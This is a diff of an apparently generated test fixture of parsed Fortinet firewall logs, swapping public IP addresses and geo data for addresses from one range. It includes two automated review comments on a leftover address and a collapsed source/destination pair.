@@ -1535,7 +1307,7 @@ }, "message": "Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0", "event": { - "ingested": "2021-06-29T09:32:55.133674300Z", + "ingested": "2021-12-09T13:37:22.357824800Z", "original": "\u003c189\u003edate=2020-04-23 time=14:32:09 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100040704\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587231129938795255 tz=\"-0300\" logdesc=\"System performance statistics\" action=\"perf-stats\" cpu=0 mem=10 totalsession=23 disk=0 bandwidth=\"23/4\" setuprate=0 disklograte=0 fazlograte=0 freediskstorage=331 sysuptime=25170 msg=\"Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0\"", "code": "0100040704", "timezone": "-0300", @@ -1599,7 +1371,7 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133681700Z", + "ingested": "2021-12-09T13:37:22.357830900Z", "original": "\u003c189\u003edate=2020-04-23 time=12:32:09 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043039\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587231130109462858 tz=\"-0500\" logdesc=\"Authentication logon\" srcip=10.10.10.10 user=\"elastiiiuser\" authserver=\"FSSO_elastiauth\" action=\"auth-logon\" status=\"logon\" msg=\"User elastiiiuser added to auth logon\"", "code": "0102043039", "timezone": "-0500", 
@@ -1620,39 +1392,15 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 3356, - "organization": { - "name": "Level 3 Parent, LLC" - } - }, "port": 500, - "ip": "8.8.5.4" + "ip": "67.43.156.13" }, "rule": { "description": "Progress IPsec phase 1" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, "port": 500, - "ip": "7.6.3.4" + "ip": "67.43.156.14" }, "message": "progress IPsec phase 1", "tags": [ @@ -1674,8 +1422,8 @@ }, "related": { "ip": [ - "7.6.3.4", - "8.8.5.4" + "67.43.156.14", + "67.43.156.13" ] }, "fortinet": { 
@@ -1696,8 +1444,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133689Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:32:00 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231120608961118 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=8.8.5.4 locip=7.6.3.4 remport=500 locport=500 outintf=\"wan1\" cookies=\"345khj34566/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"testvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"", + "ingested": "2021-12-09T13:37:22.357837200Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:32:00 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231120608961118 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.14 remport=500 locport=500 outintf=\"wan1\" cookies=\"345khj34566/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"testvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"", "code": "0101037127", "timezone": "-0500", "kind": "event", 
@@ -1740,7 +1488,7 @@ "message": "FortiSandbox AV database updated", "event": { "start": "2020-04-18T14:24:15.301-03:00", - "ingested": "2021-06-29T09:32:55.133696300Z", + "ingested": "2021-12-09T13:37:22.357843300Z", "original": "\u003c189\u003edate=2020-04-23 time=14:24:13 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100041006\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230655301863513 tz=\"-0300\" logdesc=\"FortiSandbox AV database updated\" version=\"1.522479\" msg=\"FortiSandbox AV database updated\"", "code": "0100041006", "timezone": "-0300", @@ -1800,7 +1548,7 @@ }, "event": { "start": "2020-04-18T12:23:47.558-05:00", - "ingested": "2021-06-29T09:32:55.133703700Z", + "ingested": "2021-12-09T13:37:22.357849400Z", "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0107045057\" type=\"event\" subtype=\"endpoint\" level=\"information\" vd=\"root\" eventtime=1587230627558979735 tz=\"-0500\" logdesc=\"FortiClient connection added\" action=\"add\" status=\"success\" license_limit=\"unlimited\" used_for_type=3 connection_type=\"sslvpn\" count=2 user=\"elastico\" ip=172.16.0.2 name=\"somerouter\" fctuid=\"645234fdd01F885824F764\" msg=\"Add a FortiClient Connection.\"", "code": "0107045057", "timezone": "-0500", @@ -1812,22 +1560,7 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.6" + "ip": "67.43.156.13" }, "rule": { "description": "SSL VPN new connection" @@ -1849,7 +1582,7 @@ }, "related": { "ip": [ - "8.8.8.6" + "67.43.156.13" ] }, "fortinet": { 
@@ -1863,8 +1596,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133711Z", - "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039943\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627334405765 tz=\"-0500\" logdesc=\"SSL VPN new connection\" action=\"ssl-new-con\" tunneltype=\"ssl\" tunnelid=2 remip=8.8.8.6 user=\"N/A\" group=\"N/A\" dst_host=\"N/A\" reason=\"N/A\" msg=\"SSL new connection\"", + "ingested": "2021-12-09T13:37:22.357885900Z", + "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039943\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627334405765 tz=\"-0500\" logdesc=\"SSL VPN new connection\" action=\"ssl-new-con\" tunneltype=\"ssl\" tunnelid=2 remip=67.43.156.13 user=\"N/A\" group=\"N/A\" dst_host=\"N/A\" reason=\"N/A\" msg=\"SSL new connection\"", "code": "0101039943", "timezone": "-0500", "kind": "event", @@ -1882,22 +1615,7 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 3356, - "organization": { - "name": "Level 3 Parent, LLC" - } - }, - "ip": "8.8.5.4" + "ip": "67.43.156.13" }, "rule": { "description": "SSL VPN tunnel up" @@ -1930,7 +1648,7 @@ "someuser" ], "ip": [ - "8.8.5.4" + "67.43.156.13" ] }, "fortinet": { 
@@ -1946,8 +1664,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133718100Z", - "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039947\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627698970007 tz=\"-0500\" logdesc=\"SSL VPN tunnel up\" action=\"tunnel-up\" tunneltype=\"ssl-tunnel\" tunnelid=2345 remip=8.8.5.4 tunnelip=10.10.10.10 user=\"someuser\" group=\"somegroup\" dst_host=\"N/A\" reason=\"tunnel established\" msg=\"SSL tunnel established\"", + "ingested": "2021-12-09T13:37:22.357893800Z", + "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039947\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627698970007 tz=\"-0500\" logdesc=\"SSL VPN tunnel up\" action=\"tunnel-up\" tunneltype=\"ssl-tunnel\" tunnelid=2345 remip=67.43.156.13 tunnelip=10.10.10.10 user=\"someuser\" group=\"somegroup\" dst_host=\"N/A\" reason=\"tunnel established\" msg=\"SSL tunnel established\"", "code": "0101039947", "timezone": "-0500", "kind": "event", @@ -2006,7 +1724,7 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133725300Z", + "ingested": "2021-12-09T13:37:22.357900200Z", "original": "\u003c189\u003edate=2020-04-23 time=14:16:42 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043015\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587230204674924332 tz=\"-0300\" logdesc=\"FSSO log off authentication status\" srcip=192.168.1.1 user=\"elasticadmin\" server=\"FSSO_somefssoserver\" action=\"FSSO-logoff\" msg=\"FSSO-logoff event from FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1\"", "code": "0102043015", "timezone": "-0300", @@ -2039,7 +1757,7 @@ }, "fortinet": { "firewall": { - "server": "9.9.9.9", + "server": "67.43.156.13", "action": "connect", "type": "event", "subtype": "system", 
@@ -2049,11 +1767,11 @@ "rule": { "description": "FortiCloud server connected" }, - "message": "FortiCloud 9.9.9.9 server is connected", + "message": "FortiCloud 67.43.156.13 server is connected", "event": { "start": "2020-04-18T12:16:03.121-05:00", - "ingested": "2021-06-29T09:32:55.133732500Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:16:02 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100022915\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230163121116383 tz=\"-0500\" logdesc=\"FortiCloud server connected\" server=\"9.9.9.9\" action=\"connect\" msg=\"FortiCloud 9.9.9.9 server is connected\"", + "ingested": "2021-12-09T13:37:22.357905Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:16:02 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100022915\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230163121116383 tz=\"-0500\" logdesc=\"FortiCloud server connected\" server=\"67.43.156.13\" action=\"connect\" msg=\"FortiCloud 67.43.156.13 server is connected\"", "code": "0100022915", "timezone": "-0500", "kind": "event" @@ -2093,7 +1811,7 @@ "message": "FortiCloud 4.4.4.4 server is disconnected", "event": { "start": "2020-04-18T12:16:03.375-05:00", - "ingested": "2021-06-29T09:32:55.133740Z", + "ingested": "2021-12-09T13:37:22.357927100Z", "original": "\u003c189\u003edate=2020-04-23 time=12:16:02 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100022913\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230163375149856 tz=\"-0500\" logdesc=\"FortiCloud server disconnected\" server=\"4.4.4.4\" action=\"disconnect\" reason=\"connection reset\" msg=\"FortiCloud 4.4.4.4 server is disconnected\"", "code": "0100022913", "timezone": "-0500", 
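Review bot: The FortiCloud-disconnected event in the `@@ -2093` hunk still carries `4.4.4.4` in both `message` and the `server=\"4.4.4.4\"` of `event.original` (unchanged context lines), while the connected event in the `-2049` hunk just above was moved to `67.43.156.13`, so one public non-test address remains in this fixture. Since this file is generated, the fix belongs in the input log line for that event — e.g. `server=\"67.43.156.14\"` with the matching `msg=\"FortiCloud 67.43.156.14 server is disconnected\"` (constructed from the range already used here) — followed by a regeneration, which would presumably also update the `fortinet.firewall.server` value for that event as seen in the `-2039` hunk for the connected one.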
@@ -2108,23 +1826,8 @@ "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "policy", @@ -2168,7 +1871,7 @@ "related": { "ip": [ "192.168.1.6", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { 
@@ -2188,8 +1891,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133747200Z", - "original": "\u003c188\u003edate=2020-04-23 time=12:14:09 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000011\" type=\"traffic\" subtype=\"forward\" level=\"warning\" vd=\"root\" eventtime=1587230049761513222 tz=\"-0500\" srcip=192.168.1.6 srcport=53438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=435234 proto=17 action=\"dns\" policyid=26 policytype=\"policy\" poluuid=\"2345de-b143-52134d8-6654f-4654sdfg16f431\" policyname=\"elasticnewruleset\" service=\"DNS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" appcat=\"unscanned\" crscore=5 craction=54144 crlevel=\"low\"", + "ingested": "2021-12-09T13:37:22.357931400Z", + "original": "\u003c188\u003edate=2020-04-23 time=12:14:09 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000011\" type=\"traffic\" subtype=\"forward\" level=\"warning\" vd=\"root\" eventtime=1587230049761513222 tz=\"-0500\" srcip=192.168.1.6 srcport=53438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=435234 proto=17 action=\"dns\" policyid=26 policytype=\"policy\" poluuid=\"2345de-b143-52134d8-6654f-4654sdfg16f431\" policyname=\"elasticnewruleset\" service=\"DNS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" appcat=\"unscanned\" crscore=5 craction=54144 crlevel=\"low\"", "code": "0000000011", "timezone": "-0500", "kind": "event", @@ -2211,25 +1914,10 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 40386, - "organization": { - "name": "Bloomip Inc." - } - }, "port": 6000, "bytes": 65446, "packets": 1045601, - "ip": "8.6.4.7" + "ip": "67.43.156.13" }, "rule": { "ruleset": "policy", 
@@ -2241,30 +1929,12 @@ "source": { "nat": { "port": 60964, - "ip": "123.123.123.123" - }, - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-BJ", - "city_name": "Beijing", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Beijing", - "location": { - "lon": 116.3889, - "lat": 39.9288 - } - }, - "as": { - "number": 4808, - "organization": { - "name": "China Unicom Beijing Province Network" - } + "ip": "67.43.156.14" }, "port": 6000, "bytes": 438650, - "ip": "192.168.10.10", - "packets": 723417 + "packets": 723417, + "ip": "192.168.10.10" }, "tags": [ "preserve_original_event" @@ -2299,7 +1969,7 @@ "related": { "ip": [ "192.168.10.10", - "8.6.4.7" + "67.43.156.13" ] }, "fortinet": { 
@@ -2322,8 +1992,8 @@ }, "event": { "duration": 5462000000000, - "ingested": "2021-06-29T09:32:55.133754500Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:11:51 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000020\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587229911390385486 tz=\"-0500\" srcip=192.168.10.10 srcport=6000 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.6.4.7 dstport=6000 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=4352 proto=17 action=\"accept\" policyid=3426 policytype=\"policy\" poluuid=\"1765de8-5a13-765da73fdsfa1c\" policyname=\"newruleelastic\" service=\"portname\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=123.123.123.123 transport=60964 appcat=\"unknown\" applist=\"policylist\" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728", + "ingested": "2021-12-09T13:37:22.357936400Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:11:51 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000020\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587229911390385486 tz=\"-0500\" srcip=192.168.10.10 srcport=6000 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=6000 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=4352 proto=17 action=\"accept\" policyid=3426 policytype=\"policy\" poluuid=\"1765de8-5a13-765da73fdsfa1c\" policyname=\"newruleelastic\" service=\"portname\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=67.43.156.14 transport=60964 appcat=\"unknown\" applist=\"policylist\" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728", "code": "0000000020", "timezone": "-0500", "kind": "event", 
@@ -2346,23 +2016,23 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "country_name": "Denmark", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 10.0, + "lat": 56.0 }, - "country_iso_code": "US" + "country_iso_code": "DK" }, "as": { - "number": 15169, + "number": 62121, "organization": { - "name": "Google LLC" + "name": "Christian Ebsen ApS" } }, "bytes": 20, "packets": 0, - "ip": "2001:4860:4860::8888" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "rule": { "ruleset": "someotherpolicy", @@ -2371,23 +2041,23 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "country_name": "Denmark", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 10.0, + "lat": 56.0 }, - "country_iso_code": "US" + "country_iso_code": "DK" }, "as": { - "number": 15169, + "number": 62121, "organization": { - "name": "Google LLC" + "name": "Christian Ebsen ApS" } }, "bytes": 3014, "packets": 4, - "ip": "2001:4860:4860::8888" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "tags": [ "preserve_original_event" @@ -2422,7 +2092,7 @@ }, "related": { "ip": [ - "2001:4860:4860::8888" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "fortinet": { 
@@ -2440,8 +2110,8 @@ }, "event": { "duration": 42000000000, - "ingested": "2021-06-29T09:32:55.133761800Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:11:48 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229908751434997 tz=\"-0500\" srcip=2001:4860:4860::8888 identifier=0 srcintf=\"port1\" srcintfrole=\"lan\" dstip=2001:4860:4860::8888 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=6542345 proto=58 action=\"accept\" policyid=0 policytype=\"someotherpolicy\" service=\"icmp6/1/0\" trandisp=\"noop\" app=\"icmp6/25/0\" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat=\"unscanned\"", + "ingested": "2021-12-09T13:37:22.357958800Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:11:48 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229908751434997 tz=\"-0500\" srcip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 identifier=0 srcintf=\"port1\" srcintfrole=\"lan\" dstip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=6542345 proto=58 action=\"accept\" policyid=0 policytype=\"someotherpolicy\" service=\"icmp6/1/0\" trandisp=\"noop\" app=\"icmp6/25/0\" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat=\"unscanned\"", "code": "0001000014", "timezone": "-0500", "kind": "event", @@ -2464,24 +2134,9 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "bytes": 10, "packets": 40, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "rulepolicy", 
@@ -2489,18 +2144,9 @@ "id": "0" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, "bytes": 0, "packets": 0, - "ip": "9.7.7.7" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2535,8 +2181,7 @@ }, "related": { "ip": [ - "9.7.7.7", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -2556,8 +2201,8 @@ }, "event": { "duration": 20000000000, - "ingested": "2021-06-29T09:32:55.133769100Z", - "original": "\u003c189\u003edate=2020-04-23 time=13:10:57 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229857509058693 tz=\"-0400\" srcip=9.7.7.7 identifier=61 srcintf=\"wan1\" srcintfrole=\"wan\" dstip=8.8.8.8 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=123 proto=1 action=\"accept\" policyid=0 policytype=\"rulepolicy\" service=\"PING\" dstcountry=\"Norway\" srccountry=\"Netherlands\" trandisp=\"noop\" app=\"PING\" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat=\"unscanned\"", + "ingested": "2021-12-09T13:37:22.357964600Z", + "original": "\u003c189\u003edate=2020-04-23 time=13:10:57 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229857509058693 tz=\"-0400\" srcip=67.43.156.13 identifier=61 srcintf=\"wan1\" srcintfrole=\"wan\" dstip=67.43.156.13 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=123 proto=1 action=\"accept\" policyid=0 policytype=\"rulepolicy\" service=\"PING\" dstcountry=\"Norway\" srccountry=\"Netherlands\" trandisp=\"noop\" app=\"PING\" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat=\"unscanned\"", "code": "0001000014", "timezone": "-0400", "kind": "event", 
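Review bot: In the PING event (`@@ -2556` hunk) `srcip` and `dstip` are both rewritten to `67.43.156.13`, and the matching `@@ -2535` hunk shrinks `related.ip` from two entries to one, so the fixture no longer shows source and destination being kept distinct in `related.ip`. The `-1696` hunk uses the `.13`/`.14` pair for remote and local; using `srcip=67.43.156.14` with `dstip=67.43.156.13` in the input log and regenerating would keep the two-address shape. The IPv6 event in the `-2440` hunk already had the same address on both ends before this change, so that one is pre-existing.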
@@ -2652,7 +2297,7 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133776300Z", + "ingested": "2021-12-09T13:37:22.357970300Z", "original": "\u003c188\u003edate=2020-04-23 time=12:14:39 devname=\"firewall3\" devid=\"oldfwid\" logid=\"0000000011\" type=\"traffic\" subtype=\"forward\" level=\"warning\" vd=\"root\" eventtime=1587230079841464445 tz=\"-0500\" srcip=192.168.1.1 srcport=62493 srcintf=\"port1\" srcintfrole=\"lan\" dstip=192.168.100.100 dstport=1235 dstintf=\"newinterface\" dstintfrole=\"undefined\" sessionid=54234 proto=17 action=\"ip-conn\" policyid=49 policytype=\"policy\" poluuid=\"654cc-b6542-53467u8-e45234-1566casd35f7836\" policyname=\"oldpolicyname\" user=\"elasticsuper\" authserver=\"FSSO_newfsso\" service=\"udp/12302\" dstcountry=\"Reserved\" srccountry=\"Reserved\" appcat=\"unscanned\" crscore=5 craction=63332144 crlevel=\"low\"", "code": "0000000011", "timezone": "-0500", @@ -2675,25 +2320,10 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 442, "bytes": 77654, "packets": 70, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "policy", 
@@ -2705,36 +2335,18 @@ "source": { "nat": { "port": 603, - "ip": "23.23.23.23" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.4728, - "lat": 39.0481 - } - }, - "as": { - "number": 14618, - "organization": { - "name": "Amazon.com, Inc." - } + "ip": "67.43.156.14" }, "port": 56603, - "bytes": 923, - "ip": "192.168.50.50", "user": { "name": "elasticuser", "group": { "name": "testgroup" } }, - "packets": 113 + "bytes": 923, + "packets": 113, + "ip": "192.168.50.50" }, "tags": [ "preserve_original_event" @@ -2773,7 +2385,7 @@ ], "ip": [ "192.168.50.50", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { 
@@ -2809,8 +2421,8 @@ }, "event": { "duration": 126000000000, - "ingested": "2021-06-29T09:32:55.133783500Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:14:28 devname=\"firewall3\" devid=\"oldfwid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587230069291463928 tz=\"-0500\" srcip=192.168.50.50 srcport=56603 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=442 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=2345 proto=6 action=\"close\" policyid=2365 policytype=\"policy\" poluuid=\"654644c-b064-fdgdf3425-f003-1234ghdf682e05f\" policyname=\"someoldpolicyname\" user=\"elasticuser\" group=\"testgroup\" authserver=\"FSSO_something\" service=\"HTTPS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=23.23.23.23 transport=603 appid=43540 app=\"Skype.Portals\" appcat=\"Collaboration\" apprisk=\"elevated\" applist=\"someapplist\" appact=\"detected\" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality=\"Seq_num(3), alive, selected\" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction=\"block\" countweb=1 countapp=1 crscore=5 craction=6144 crlevel=\"low\"", + "ingested": "2021-12-09T13:37:22.357976Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:14:28 devname=\"firewall3\" devid=\"oldfwid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587230069291463928 tz=\"-0500\" srcip=192.168.50.50 srcport=56603 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=442 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=2345 proto=6 action=\"close\" policyid=2365 policytype=\"policy\" poluuid=\"654644c-b064-fdgdf3425-f003-1234ghdf682e05f\" policyname=\"someoldpolicyname\" user=\"elasticuser\" group=\"testgroup\" authserver=\"FSSO_something\" service=\"HTTPS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=67.43.156.14 transport=603 appid=43540 
app=\"Skype.Portals\" appcat=\"Collaboration\" apprisk=\"elevated\" applist=\"someapplist\" appact=\"detected\" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality=\"Seq_num(3), alive, selected\" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction=\"block\" countweb=1 countapp=1 crscore=5 craction=6144 crlevel=\"low\"", "code": "0000000013", "timezone": "-0500", "kind": "event", @@ -2833,23 +2445,8 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "Europe", - "country_name": "France", - "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" - }, - "as": { - "number": 41690, - "organization": { - "name": "Dailymotion S.A." - } - }, "port": 443, - "ip": "195.8.215.136" + "ip": "67.43.156.14" }, "rule": { "ruleset": "block-social.media", @@ -2896,7 +2493,7 @@ "related": { "ip": [ "10.1.100.22", - "195.8.215.136" + "67.43.156.14" ] }, "fortinet": { 
@@ -2927,8 +2524,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133791Z", - "original": "\u003c190\u003edate=2019-05-15 time=18:03:36 logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"app-ctrl-all\" level=\"information\" vd=\"root\" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=195.8.215.136 srcport=50798 dstport=443 srcintf=\"port10\" srcintfrole=\"lan\" dstintf=\"port9\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" direction=\"outgoing\" policyid=1 sessionid=4414 applist=\"block-social.media\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" action=\"pass\" hostname=\"www.dailymotion.com\" incidentserialno=1962906680 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"*.dailymotion.com\" scertissuer=\"DigiCert SHA2 High Assurance Server CA\"", + "ingested": "2021-12-09T13:37:22.357981800Z", + "original": "\u003c190\u003edate=2019-05-15 time=18:03:36 logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"app-ctrl-all\" level=\"information\" vd=\"root\" 